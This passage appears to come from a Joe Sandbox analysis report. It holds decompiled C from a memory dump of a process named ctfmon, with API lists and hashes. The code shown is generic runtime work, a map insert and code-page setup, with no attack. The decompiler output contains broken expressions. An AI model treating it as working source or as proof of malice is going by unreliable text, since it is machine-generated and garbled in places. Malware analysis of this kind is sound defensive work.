                                                									_t194 = 0 | _t91;
                                                								} else {
                                                									_t194 = _t194 | 0xffffffff;
                                                								}
                                                								_t264 = _t194;
                                                							}
                                                							_t174 = _t194 & 0xffffff00 | _t264 < 0x00000000;
                                                							_v32 = _t174;
                                                							if(_t174 == 0) {
                                                								_t242 =  *((intOrPtr*)(_t242 + 8));
                                                							} else {
                                                								_t242 =  *_t242;
                                                							}
                                                						} while ( *((char*)(_t242 + 0xd)) == 0);
                                                						_t209 = _v28;
                                                						_t225 =  *0x996a54;
                                                					}
                                                					_t243 = _t209;
                                                					_a8 = _t243;
                                                					if(_t174 == 0) {
                                                						L62:
                                                						__eflags =  *((intOrPtr*)(_t199 + 0x14)) - 0x10;
                                                						_t107 = _t243 + 0x10; // 0x11
                                                						_t210 = _t107;
                                                						_t226 =  *((intOrPtr*)(_t199 + 0x10));
                                                						_a8 = _t226;
                                                						if( *((intOrPtr*)(_t199 + 0x14)) >= 0x10) {
                                                							_t199 =  *_t199;
                                                						}
                                                						__eflags =  *((intOrPtr*)(_t210 + 0x14)) - 0x10;
                                                						_t232 =  *((intOrPtr*)(_t210 + 0x10));
                                                						if( *((intOrPtr*)(_t210 + 0x14)) >= 0x10) {
                                                							_t210 =  *_t210;
                                                						}
                                                						__eflags = _t232 - _t226;
                                                						_t227 = _t199;
                                                						_t176 =  <  ? _t232 : _t226;
                                                						_t177 = E009651A0(_t210, _t199,  <  ? _t232 : _t226);
                                                						__eflags = _t177;
                                                						if(__eflags == 0) {
                                                							_t210 = _a8;
                                                							__eflags = _t232 - _t210;
                                                							if(_t232 >= _t210) {
                                                								__eflags = _t232 - _t210;
                                                								_t114 = _t232 != _t210;
                                                								__eflags = _t114;
                                                								_t177 = 0 | _t114;
                                                							} else {
                                                								_t177 = _t177 | 0xffffffff;
                                                							}
                                                							__eflags = _t177;
                                                						}
                                                						if(__eflags == 0) {
                                                							_t200 = _a12;
                                                							_t179 =  *((intOrPtr*)(_t200 + 0x24));
                                                							_t233 = _t200 + 0x10;
                                                							__eflags = _t179 - 0x10;
                                                							if(_t179 >= 0x10) {
                                                								__eflags = _t179 + 1;
                                                								E00965CF0(_t200, _t227, _t233,  *_t233, _t179 + 1);
                                                							}
                                                							 *((intOrPtr*)(_t233 + 0x14)) = 0xf;
                                                							 *((intOrPtr*)(_t233 + 0x10)) = 0;
                                                							__eflags =  *((intOrPtr*)(_t233 + 0x14)) - 0x10;
                                                							if( *((intOrPtr*)(_t233 + 0x14)) >= 0x10) {
                                                								_t233 =  *_t233;
                                                							}
                                                							 *_t233 = 0;
                                                							L00970D45(_t200);
                                                							_t181 = _v0;
                                                							 *_t181 = _t243;
                                                							 *((char*)(_t181 + 4)) = 0;
                                                							 *[fs:0x0] = _v20;
                                                							return _t181;
                                                						} else {
                                                							_push(_a12);
                                                							_t185 = E00966950(_t199, _t227,  &_a8, _v32, _v28, _t210);
                                                							_t186 = _v0;
                                                							 *_t186 =  *_t185;
                                                							 *((char*)(_t186 + 4)) = 1;
                                                							 *[fs:0x0] = _v20;
                                                							return _t186;
                                                						}
                                                					} else {
                                                						if(_t209 !=  *_t225) {
                                                							E009668F0( &_a8);
                                                							_t243 = _a8;
                                                							goto L62;
                                                						} else {
                                                							_push(_a12);
                                                							_t190 = E00966950(_t199, _t225,  &_a8, 1, _t209, _t209);
                                                							_t191 = _v0;
                                                							 *_t191 =  *_t190;
                                                							 *((char*)(_t191 + 4)) = 1;
                                                							 *[fs:0x0] = _v20;
                                                							return _t191;
                                                						}
                                                					}
                                                				}
                                                			}
                                                0x00966bca
                                                0x00966bca
                                                0x00966bca
                                                0x00966bd6
                                                0x00966bd6
                                                0x00966bd8
                                                0x00966bdb
                                                0x00966be0
                                                0x00966be6
                                                0x00966be2
                                                0x00966be2
                                                0x00966be2
                                                0x00966be9
                                                0x00966bef
                                                0x00966bf2
                                                0x00966bf2
                                                0x00966bf8
                                                0x00966bfa
                                                0x00966bff
                                                0x00966c3f
                                                0x00966c3f
                                                0x00966c43
                                                0x00966c43
                                                0x00966c46
                                                0x00966c49
                                                0x00966c4c
                                                0x00966c4e
                                                0x00966c4e
                                                0x00966c50
                                                0x00966c54
                                                0x00966c57
                                                0x00966c59
                                                0x00966c59
                                                0x00966c5b
                                                0x00966c5f
                                                0x00966c61
                                                0x00966c65
                                                0x00966c6d
                                                0x00966c6f
                                                0x00966c71
                                                0x00966c74
                                                0x00966c76
                                                0x00966c7f
                                                0x00966c81
                                                0x00966c81
                                                0x00966c81
                                                0x00966c78
                                                0x00966c78
                                                0x00966c78
                                                0x00966c84
                                                0x00966c84
                                                0x00966c8b
                                                0x00966cd0
                                                0x00966cd3
                                                0x00966cd6
                                                0x00966cd9
                                                0x00966cdc
                                                0x00966cde
                                                0x00966ce2
                                                0x00966ce2
                                                0x00966ce7
                                                0x00966cee
                                                0x00966cf5
                                                0x00966cf9
                                                0x00966cfb
                                                0x00966cfb
                                                0x00966cfe
                                                0x00966d01
                                                0x00966d06
                                                0x00966d0c
                                                0x00966d0e
                                                0x00966d15
                                                0x00966d23
                                                0x00966c8d
                                                0x00966c8d
                                                0x00966c9b
                                                0x00966ca2
                                                0x00966ca5
                                                0x00966ca7
                                                0x00966cae
                                                0x00966cbc
                                                0x00966cbc
                                                0x00966c01
                                                0x00966c03
                                                0x00966c37
                                                0x00966c3c
                                                0x00000000
                                                0x00966c05
                                                0x00966c05
                                                0x00966c10
                                                0x00966c17
                                                0x00966c1a
                                                0x00966c1c
                                                0x00966c23
                                                0x00966c31
                                                0x00966c31
                                                0x00966c03
                                                0x00966bff

                                                APIs
                                                • std::_Xinvalid_argument.LIBCPMT ref: 00966B2E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Xinvalid_argumentstd::_
                                                • String ID: /LU5/$map/set<T> too long
                                                • API String ID: 909987262-3393314386
                                                • Opcode ID: 6fbb7ac744c8d37632ea553d727169f2b99aae55cad6063c552ab7762e497ec9
                                                • Instruction ID: 714a05bcbe0c6740a1768895071b7ceeea2c7b401693395bb788a073cafd538d
                                                • Opcode Fuzzy Hash: 6fbb7ac744c8d37632ea553d727169f2b99aae55cad6063c552ab7762e497ec9
                                                • Instruction Fuzzy Hash: D1C18870608241CFCB15CF18C584A2ABBE5FF45314F29C99AE8899B3A2D775EC81CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E00968170(void* __ebx, void* __edx, intOrPtr* _a4, char _a8, intOrPtr* _a12, intOrPtr* _a20) {
                                                				intOrPtr* _v0;
                                                				intOrPtr* _v4;
                                                				intOrPtr _v20;
                                                				char _v24;
                                                				intOrPtr* _v28;
                                                				signed int _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				char _v44;
                                                				void* __edi;
                                                				void* __ebp;
                                                				intOrPtr _t133;
                                                				intOrPtr* _t135;
                                                				intOrPtr _t136;
                                                				intOrPtr* _t139;
                                                				intOrPtr* _t140;
                                                				intOrPtr _t146;
                                                				intOrPtr _t148;
                                                				intOrPtr* _t149;
                                                				intOrPtr _t150;
                                                				intOrPtr _t160;
                                                				intOrPtr _t162;
                                                				intOrPtr* _t163;
                                                				signed int _t171;
                                                				signed int _t174;
                                                				signed int _t177;
                                                				intOrPtr _t179;
                                                				intOrPtr* _t181;
                                                				intOrPtr* _t185;
                                                				intOrPtr* _t186;
                                                				intOrPtr* _t190;
                                                				intOrPtr* _t191;
                                                				signed int _t194;
                                                				void* _t198;
                                                				intOrPtr* _t199;
                                                				intOrPtr _t200;
                                                				intOrPtr _t204;
                                                				intOrPtr _t205;
                                                				intOrPtr _t206;
                                                				intOrPtr* _t207;
                                                				intOrPtr* _t208;
                                                				void* _t209;
                                                				void* _t210;
                                                				intOrPtr* _t220;
                                                				intOrPtr _t221;
                                                				intOrPtr* _t223;
                                                				intOrPtr* _t224;
                                                				intOrPtr* _t225;
                                                				char _t226;
                                                				intOrPtr* _t228;
                                                				intOrPtr* _t230;
                                                				intOrPtr _t232;
                                                				char* _t233;
                                                				intOrPtr _t237;
                                                				intOrPtr* _t239;
                                                				char* _t241;
                                                				intOrPtr* _t242;
                                                				char _t243;
                                                				void* _t249;
                                                				signed int _t250;
                                                				intOrPtr _t251;
                                                				signed int _t264;
                                                
                                                				_t198 = __ebx;
                                                				_t133 =  *0x996a90;
                                                				_t230 = _a20;
                                                				if(_t133 < 0x5d1745c) {
                                                					 *0x996a90 = _t133 + 1;
                                                					_t135 = _a12;
                                                					 *((intOrPtr*)(_t230 + 4)) = _t135;
                                                					_t204 =  *0x996a8c;
                                                					__eflags = _t135 - _t204;
                                                					if(_t135 != _t204) {
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							 *((intOrPtr*)(_t135 + 8)) = _t230;
                                                							_t205 =  *0x996a8c;
                                                							__eflags = _t135 -  *((intOrPtr*)(_t205 + 8));
                                                							if(_t135 ==  *((intOrPtr*)(_t205 + 8))) {
                                                								 *((intOrPtr*)(_t205 + 8)) = _t230;
                                                							}
                                                						} else {
                                                							 *_t135 = _t230;
                                                							_t208 =  *0x996a8c;
                                                							__eflags = _t135 -  *_t208;
                                                							if(_t135 ==  *_t208) {
                                                								 *_t208 = _t230;
                                                							}
                                                						}
                                                					} else {
                                                						 *((intOrPtr*)(_t204 + 4)) = _t230;
                                                						 *((intOrPtr*)( *0x996a8c)) = _t230;
                                                						 *((intOrPtr*)( *0x996a8c + 8)) = _t230;
                                                					}
                                                					_t15 = _t230 + 4; // 0xc6088908
                                                					_t136 =  *_t15;
                                                					_t239 = _t230;
                                                					__eflags =  *((char*)(_t136 + 0xc));
                                                					if( *((char*)(_t136 + 0xc)) == 0) {
                                                						do {
                                                							_t17 = _t239 + 4; // 0xc6088908
                                                							_t140 =  *_t17;
                                                							_t223 =  *((intOrPtr*)(_t140 + 4));
                                                							_t206 =  *_t223;
                                                							__eflags = _t140 - _t206;
                                                							if(_t140 != _t206) {
                                                								__eflags =  *((char*)(_t206 + 0xc));
                                                								if( *((char*)(_t206 + 0xc)) != 0) {
                                                									__eflags = _t239 -  *_t140;
                                                									if(_t239 ==  *_t140) {
                                                										_t239 = _t140;
                                                										E00968550(_t239);
                                                									}
                                                									_t51 = _t239 + 4; // 0xc6088908
                                                									 *((char*)( *_t51 + 0xc)) = 1;
                                                									_t53 = _t239 + 4; // 0xc6088908
                                                									 *((char*)( *((intOrPtr*)( *_t53 + 4)) + 0xc)) = 0;
                                                									_t56 = _t239 + 4; // 0xc6088908
                                                									_t207 =  *((intOrPtr*)( *_t56 + 4));
                                                									_t224 =  *((intOrPtr*)(_t207 + 8));
                                                									 *((intOrPtr*)(_t207 + 8)) =  *_t224;
                                                									_t146 =  *_t224;
                                                									__eflags =  *((char*)(_t146 + 0xd));
                                                									if( *((char*)(_t146 + 0xd)) == 0) {
                                                										 *((intOrPtr*)(_t146 + 4)) = _t207;
                                                									}
                                                									 *((intOrPtr*)(_t224 + 4)) =  *((intOrPtr*)(_t207 + 4));
                                                									_t148 =  *0x996a8c;
                                                									__eflags = _t207 -  *((intOrPtr*)(_t148 + 4));
                                                									if(_t207 !=  *((intOrPtr*)(_t148 + 4))) {
                                                										_t149 =  *((intOrPtr*)(_t207 + 4));
                                                										__eflags = _t207 -  *_t149;
                                                										if(_t207 !=  *_t149) {
                                                											 *((intOrPtr*)(_t149 + 8)) = _t224;
                                                										} else {
                                                											 *_t149 = _t224;
                                                										}
                                                									} else {
                                                										 *((intOrPtr*)(_t148 + 4)) = _t224;
                                                									}
                                                									 *_t224 = _t207;
                                                									goto L36;
                                                								} else {
                                                									goto L25;
                                                								}
                                                							} else {
                                                								_t206 =  *((intOrPtr*)(_t223 + 8));
                                                								__eflags =  *((char*)(_t206 + 0xc));
                                                								if( *((char*)(_t206 + 0xc)) == 0) {
                                                									L25:
                                                									 *((char*)(_t140 + 0xc)) = 1;
                                                									 *((char*)(_t206 + 0xc)) = 1;
                                                									_t46 = _t239 + 4; // 0xc6088908
                                                									 *((char*)( *((intOrPtr*)( *_t46 + 4)) + 0xc)) = 0;
                                                									_t49 = _t239 + 4; // 0xc6088908
                                                									_t239 =  *((intOrPtr*)( *_t49 + 4));
                                                								} else {
                                                									__eflags = _t239 -  *((intOrPtr*)(_t140 + 8));
                                                									if(_t239 ==  *((intOrPtr*)(_t140 + 8))) {
                                                										_t239 = _t140;
                                                										E009685B0(_t239);
                                                									}
                                                									 *((char*)( *((intOrPtr*)(_t239 + 4)) + 0xc)) = 1;
                                                									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t239 + 4)) + 4)) + 0xc)) = 0;
                                                									_t207 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 4)) + 4));
                                                									_t224 =  *_t207;
                                                									 *_t207 =  *((intOrPtr*)(_t224 + 8));
                                                									_t160 =  *((intOrPtr*)(_t224 + 8));
                                                									__eflags =  *((char*)(_t160 + 0xd));
                                                									if( *((char*)(_t160 + 0xd)) == 0) {
                                                										 *((intOrPtr*)(_t160 + 4)) = _t207;
                                                									}
                                                									 *((intOrPtr*)(_t224 + 4)) =  *((intOrPtr*)(_t207 + 4));
                                                									_t162 =  *0x996a8c;
                                                									__eflags = _t207 -  *((intOrPtr*)(_t162 + 4));
                                                									if(_t207 !=  *((intOrPtr*)(_t162 + 4))) {
                                                										_t163 =  *((intOrPtr*)(_t207 + 4));
                                                										__eflags = _t207 -  *((intOrPtr*)(_t163 + 8));
                                                										if(_t207 !=  *((intOrPtr*)(_t163 + 8))) {
                                                											 *_t163 = _t224;
                                                											 *((intOrPtr*)(_t224 + 8)) = _t207;
                                                										} else {
                                                											 *((intOrPtr*)(_t163 + 8)) = _t224;
                                                											 *((intOrPtr*)(_t224 + 8)) = _t207;
                                                										}
                                                									} else {
                                                										 *((intOrPtr*)(_t162 + 4)) = _t224;
                                                										 *((intOrPtr*)(_t224 + 8)) = _t207;
                                                									}
                                                									L36:
                                                									 *((intOrPtr*)(_t207 + 4)) = _t224;
                                                								}
                                                							}
                                                							_t69 = _t239 + 4; // 0xc6088908
                                                							_t150 =  *_t69;
                                                							__eflags =  *((char*)(_t150 + 0xc));
                                                						} while ( *((char*)(_t150 + 0xc)) == 0);
                                                					}
                                                					 *((char*)( *((intOrPtr*)( *0x996a8c + 4)) + 0xc)) = 1;
                                                					_t139 = _a4;
                                                					 *_t139 = _t230;
                                                					return _t139;
                                                				} else {
                                                					_t2 = _t230 + 0x24; // 0x6affffe3
                                                					_t167 =  *_t2;
                                                					_t3 = _t230 + 0x10; // 0x9684d0
                                                					_t241 = _t3;
                                                					if( *_t2 >= 0x10) {
                                                						E00965CF0(__ebx, __edx, _t230,  *_t241, _t167 + 1);
                                                					}
                                                					 *((intOrPtr*)(_t241 + 0x14)) = 0xf;
                                                					 *((intOrPtr*)(_t241 + 0x10)) = 0;
                                                					if( *((intOrPtr*)(_t241 + 0x14)) >= 0x10) {
                                                						_t241 =  *_t241;
                                                					}
                                                					 *_t241 = 0;
                                                					L00970D45(_t230);
                                                					_t250 = _t249 + 4;
                                                					_push("map/set<T> too long");
                                                					E009718DF();
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					_push(0xffffffff);
                                                					_push(E009846D0);
                                                					_push( *[fs:0x0]);
                                                					_t251 = _t250 - 0xc;
                                                					_push(_t198);
                                                					_push(_t241);
                                                					_push(_t230);
                                                					_t171 =  *0x98f008; // 0x35554c2f
                                                					_push(_t171 ^ _t250);
                                                					 *[fs:0x0] =  &_v32;
                                                					_v36 = _t251;
                                                					_v24 = 0;
                                                					_t174 = 1;
                                                					_t225 =  *0x996a8c;
                                                					_t209 = _t225;
                                                					_t199 = _v4;
                                                					_v40 = _t209;
                                                					_v44 = 1;
                                                					_t242 =  *((intOrPtr*)(_t225 + 4));
                                                					if( *((char*)(_t242 + 0xd)) == 0) {
                                                						do {
                                                							_t83 = _t242 + 0x10; // 0x10
                                                							_t228 = _t83;
                                                							_t237 =  *((intOrPtr*)(_t228 + 0x10));
                                                							_v28 = _t242;
                                                							if( *((intOrPtr*)(_t242 + 0x24)) >= 0x10) {
                                                								_t228 =  *_t228;
                                                							}
                                                							if( *((intOrPtr*)(_t199 + 0x14)) < 0x10) {
                                                								_t220 = _t199;
                                                							} else {
                                                								_t220 =  *_t199;
                                                							}
                                                							_t193 =  <  ?  *((void*)(_t199 + 0x10)) : _t237;
                                                							_t194 = E009651A0(_t220, _t228,  <  ?  *((void*)(_t199 + 0x10)) : _t237);
                                                							_t251 = _t251 + 4;
                                                							if(_t194 == 0) {
                                                								_t221 =  *((intOrPtr*)(_t199 + 0x10));
                                                								if(_t221 >= _t237) {
                                                									__eflags = _t221 - _t237;
                                                									_t91 = _t221 != _t237;
                                                									__eflags = _t91;
                                                									_t194 = 0 | _t91;
                                                								} else {
                                                									_t194 = _t194 | 0xffffffff;
                                                								}
                                                								_t264 = _t194;
                                                							}
                                                							_t174 = _t194 & 0xffffff00 | _t264 < 0x00000000;
                                                							_v32 = _t174;
                                                							if(_t174 == 0) {
                                                								_t242 =  *((intOrPtr*)(_t242 + 8));
                                                							} else {
                                                								_t242 =  *_t242;
                                                							}
                                                						} while ( *((char*)(_t242 + 0xd)) == 0);
                                                						_t209 = _v28;
                                                						_t225 =  *0x996a8c;
                                                					}
                                                					_t243 = _t209;
                                                					_a8 = _t243;
                                                					if(_t174 == 0) {
                                                						L62:
                                                						__eflags =  *((intOrPtr*)(_t199 + 0x14)) - 0x10;
                                                						_t210 = _t243 + 0x10;
                                                						_t226 =  *((intOrPtr*)(_t199 + 0x10));
                                                						_a8 = _t226;
                                                						if( *((intOrPtr*)(_t199 + 0x14)) >= 0x10) {
                                                							_t199 =  *_t199;
                                                						}
                                                						__eflags =  *((intOrPtr*)(_t210 + 0x14)) - 0x10;
                                                						_t232 =  *((intOrPtr*)(_t210 + 0x10));
                                                						if( *((intOrPtr*)(_t210 + 0x14)) >= 0x10) {
                                                							_t210 =  *_t210;
                                                						}
                                                						__eflags = _t232 - _t226;
                                                						_t227 = _t199;
                                                						_t176 =  <  ? _t232 : _t226;
                                                						_t177 = E009651A0(_t210, _t199,  <  ? _t232 : _t226);
                                                						__eflags = _t177;
                                                						if(__eflags == 0) {
                                                							_t210 = _a8;
                                                							__eflags = _t232 - _t210;
                                                							if(_t232 >= _t210) {
                                                								__eflags = _t232 - _t210;
                                                								_t114 = _t232 != _t210;
                                                								__eflags = _t114;
                                                								_t177 = 0 | _t114;
                                                							} else {
                                                								_t177 = _t177 | 0xffffffff;
                                                							}
                                                							__eflags = _t177;
                                                						}
                                                						if(__eflags == 0) {
                                                							_t200 = _a12;
                                                							_t179 =  *((intOrPtr*)(_t200 + 0x24));
                                                							_t233 = _t200 + 0x10;
                                                							__eflags = _t179 - 0x10;
                                                							if(_t179 >= 0x10) {
                                                								__eflags = _t179 + 1;
                                                								E00965CF0(_t200, _t227, _t233,  *_t233, _t179 + 1);
                                                							}
                                                							 *((intOrPtr*)(_t233 + 0x14)) = 0xf;
                                                							 *((intOrPtr*)(_t233 + 0x10)) = 0;
                                                							__eflags =  *((intOrPtr*)(_t233 + 0x14)) - 0x10;
                                                							if( *((intOrPtr*)(_t233 + 0x14)) >= 0x10) {
                                                								_t233 =  *_t233;
                                                							}
                                                							 *_t233 = 0;
                                                							L00970D45(_t200);
                                                							_t181 = _v0;
                                                							 *_t181 = _t243;
                                                							 *((char*)(_t181 + 4)) = 0;
                                                							 *[fs:0x0] = _v20;
                                                							return _t181;
                                                						} else {
                                                							_push(_a12);
                                                							_t185 = E00968170(_t199, _t227,  &_a8, _v32, _v28, _t210);
                                                							_t186 = _v0;
                                                							 *_t186 =  *_t185;
                                                							 *((char*)(_t186 + 4)) = 1;
                                                							 *[fs:0x0] = _v20;
                                                							return _t186;
                                                						}
                                                					} else {
                                                						if(_t209 !=  *_t225) {
                                                							E009668F0( &_a8);
                                                							_t243 = _a8;
                                                							goto L62;
                                                						} else {
                                                							_push(_a12);
                                                							_t190 = E00968170(_t199, _t225,  &_a8, 1, _t209, _t209);
                                                							_t191 = _v0;
                                                							 *_t191 =  *_t190;
                                                							 *((char*)(_t191 + 4)) = 1;
                                                							 *[fs:0x0] = _v20;
                                                							return _t191;
                                                						}
                                                					}
                                                				}
                                                			}


                                                APIs
                                                • std::_Xinvalid_argument.LIBCPMT ref: 0096834E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Xinvalid_argumentstd::_
                                                • String ID: /LU5/$map/set<T> too long
                                                • API String ID: 909987262-3393314386
                                                • Opcode ID: f283189b15b9a789867c6b611c21c3495783787a767055e677e5adf6630c889f
                                                • Instruction ID: 66e072e2734fae53bd6fa1701938a20bfaadef96d7bca95c9b37e00466c29eab
                                                • Opcode Fuzzy Hash: f283189b15b9a789867c6b611c21c3495783787a767055e677e5adf6630c889f
                                                • Instruction Fuzzy Hash: 81C1AC70604241CFDB15CF18C484A66BBE5FF45314F29CA99E85A9B3A2DB75EC81CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0097ACD1(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                				signed int _v8;
                                                				char _v22;
                                                				struct _cpinfo _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				void* __esi;
                                                				signed int _t48;
                                                				int _t51;
                                                				signed int _t54;
                                                				signed int _t55;
                                                				short _t58;
                                                				signed char _t62;
                                                				signed int _t63;
                                                				signed char* _t72;
                                                				signed char* _t73;
                                                				int _t78;
                                                				signed int _t81;
                                                				signed char* _t82;
                                                				short* _t83;
                                                				int _t87;
                                                				signed char _t88;
                                                				signed int _t89;
                                                				signed int _t91;
                                                				signed int _t92;
                                                				int _t94;
                                                				int _t95;
                                                				intOrPtr _t97;
                                                				signed int _t98;
                                                
                                                				_t48 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t48 ^ _t98;
                                                				_t97 = _a8;
                                                				_t78 = E0097A8A4(__eflags, _a4);
                                                				if(_t78 != 0) {
                                                					_t94 = 0;
                                                					__eflags = 0;
                                                					_t81 = 0;
                                                					_t51 = 0;
                                                					_v32 = 0;
                                                					while(1) {
                                                						__eflags =  *((intOrPtr*)(_t51 + 0x990628)) - _t78;
                                                						if( *((intOrPtr*)(_t51 + 0x990628)) == _t78) {
                                                							break;
                                                						}
                                                						_t81 = _t81 + 1;
                                                						_t51 = _t51 + 0x30;
                                                						_v32 = _t81;
                                                						__eflags = _t51 - 0xf0;
                                                						if(_t51 < 0xf0) {
                                                							continue;
                                                						} else {
                                                							__eflags = _t78 - 0xfde8;
                                                							if(_t78 == 0xfde8) {
                                                								L23:
                                                							} else {
                                                								__eflags = _t78 - 0xfde9;
                                                								if(_t78 == 0xfde9) {
                                                									goto L23;
                                                								} else {
                                                									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
                                                									__eflags = _t51;
                                                									if(_t51 == 0) {
                                                										goto L23;
                                                									} else {
                                                										_t51 = GetCPInfo(_t78,  &_v28);
                                                										__eflags = _t51;
                                                										if(_t51 == 0) {
                                                											__eflags =  *0x9967ec - _t94;
                                                											if( *0x9967ec == _t94) {
                                                												goto L23;
                                                											} else {
                                                												E0097A917(_t97);
                                                												goto L37;
                                                											}
                                                										} else {
                                                											E00973440(_t94, _t97 + 0x18, _t94, 0x101);
                                                											 *(_t97 + 4) = _t78;
                                                											 *(_t97 + 0x21c) = _t94;
                                                											_t78 = 1;
                                                											__eflags = _v28 - 1;
                                                											if(_v28 <= 1) {
                                                												 *(_t97 + 8) = _t94;
                                                											} else {
                                                												__eflags = _v22;
                                                												_t72 =  &_v22;
                                                												if(_v22 != 0) {
                                                													while(1) {
                                                														_t88 = _t72[1];
                                                														__eflags = _t88;
                                                														if(_t88 == 0) {
                                                															goto L16;
                                                														}
                                                														_t91 = _t88 & 0x000000ff;
                                                														_t89 =  *_t72 & 0x000000ff;
                                                														while(1) {
                                                															__eflags = _t89 - _t91;
                                                															if(_t89 > _t91) {
                                                																break;
                                                															}
                                                															 *(_t97 + _t89 + 0x19) =  *(_t97 + _t89 + 0x19) | 0x00000004;
                                                															_t89 = _t89 + 1;
                                                															__eflags = _t89;
                                                														}
                                                														_t72 =  &(_t72[2]);
                                                														__eflags =  *_t72;
                                                														if( *_t72 != 0) {
                                                															continue;
                                                														}
                                                														goto L16;
                                                													}
                                                												}
                                                												L16:
                                                												_t73 = _t97 + 0x1a;
                                                												_t87 = 0xfe;
                                                												do {
                                                													 *_t73 =  *_t73 | 0x00000008;
                                                													_t73 =  &(_t73[1]);
                                                													_t87 = _t87 - 1;
                                                													__eflags = _t87;
                                                												} while (_t87 != 0);
                                                												 *(_t97 + 0x21c) = E0097A866( *(_t97 + 4));
                                                												 *(_t97 + 8) = _t78;
                                                											}
                                                											_t95 = _t97 + 0xc;
                                                											asm("stosd");
                                                											asm("stosd");
                                                											asm("stosd");
                                                											L36:
                                                											E0097A97C(_t78, _t91, _t95, _t97);
                                                											L37:
                                                											__eflags = 0;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                						goto L39;
                                                					}
                                                					E00973440(_t94, _t97 + 0x18, _t94, 0x101);
                                                					_t54 = _v32 * 0x30;
                                                					__eflags = _t54;
                                                					_v36 = _t54;
                                                					_t55 = _t54 + 0x990638;
                                                					_v32 = _t55;
                                                					do {
                                                						__eflags =  *_t55;
                                                						_t82 = _t55;
                                                						if( *_t55 != 0) {
                                                							while(1) {
                                                								_t62 = _t82[1];
                                                								__eflags = _t62;
                                                								if(_t62 == 0) {
                                                									break;
                                                								}
                                                								_t92 =  *_t82 & 0x000000ff;
                                                								_t63 = _t62 & 0x000000ff;
                                                								while(1) {
                                                									__eflags = _t92 - _t63;
                                                									if(_t92 > _t63) {
                                                										break;
                                                									}
                                                									__eflags = _t92 - 0x100;
                                                									if(_t92 < 0x100) {
                                                										_t31 = _t94 + 0x990624; // 0x8040201
                                                										 *(_t97 + _t92 + 0x19) =  *(_t97 + _t92 + 0x19) |  *_t31;
                                                										_t92 = _t92 + 1;
                                                										__eflags = _t92;
                                                										_t63 = _t82[1] & 0x000000ff;
                                                										continue;
                                                									}
                                                									break;
                                                								}
                                                								_t82 =  &(_t82[2]);
                                                								__eflags =  *_t82;
                                                								if( *_t82 != 0) {
                                                									continue;
                                                								}
                                                								break;
                                                							}
                                                							_t55 = _v32;
                                                						}
                                                						_t94 = _t94 + 1;
                                                						_t55 = _t55 + 8;
                                                						_v32 = _t55;
                                                						__eflags = _t94 - 4;
                                                					} while (_t94 < 4);
                                                					 *(_t97 + 4) = _t78;
                                                					 *(_t97 + 8) = 1;
                                                					 *(_t97 + 0x21c) = E0097A866(_t78);
                                                					_t83 = _t97 + 0xc;
                                                					_t91 = _v36 + 0x99062c;
                                                					_t95 = 6;
                                                					do {
                                                						_t58 =  *_t91;
                                                						_t91 = _t91 + 2;
                                                						 *_t83 = _t58;
                                                						_t83 = _t83 + 2;
                                                						_t95 = _t95 - 1;
                                                						__eflags = _t95;
                                                					} while (_t95 != 0);
                                                					goto L36;
                                                				} else {
                                                					E0097A917(_t97);
                                                				}
                                                				L39:
                                                				return E00970A5D(_v8 ^ _t98, _t97);
                                                			}


                                                APIs
                                                  • Part of subcall function 0097A8A4: GetOEMCP.KERNEL32(00000000,?,?,0097AB2D,?), ref: 0097A8CF
                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0097AB72,?,00000000), ref: 0097AD45
                                                • GetCPInfo.KERNEL32(00000000,0097AB72,?,?,?,0097AB72,?,00000000), ref: 0097AD58
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CodeInfoPageValid
                                                • String ID: /LU5/
                                                • API String ID: 546120528-937868281
                                                • Opcode ID: 85edcd2bdfb2b28d6b1916e30c3ab424558ff74e2b5e2cbe0ddd2db8493e4046
                                                • Instruction ID: 5b28e5f2ebf7c397530f1678f4ad60f42a349023c4b447ee3afeedfe1dfc2be3
                                                • Opcode Fuzzy Hash: 85edcd2bdfb2b28d6b1916e30c3ab424558ff74e2b5e2cbe0ddd2db8493e4046
                                                • Instruction Fuzzy Hash: 945133729042459EDB248F35C8857BFBBE8EFC1310F14C46ED09E8B691E7389946CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E0097A97C(void* __ebx, signed int __edx, void* __edi, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v264;
                                                				char _v520;
                                                				char _v776;
                                                				char _v1800;
                                                				char _v1814;
                                                				struct _cpinfo _v1820;
                                                				intOrPtr _v1824;
                                                				signed int _v1828;
                                                				void* __esi;
                                                				signed int _t63;
                                                				void* _t67;
                                                				signed int _t68;
                                                				intOrPtr _t69;
                                                				void* _t72;
                                                				char _t73;
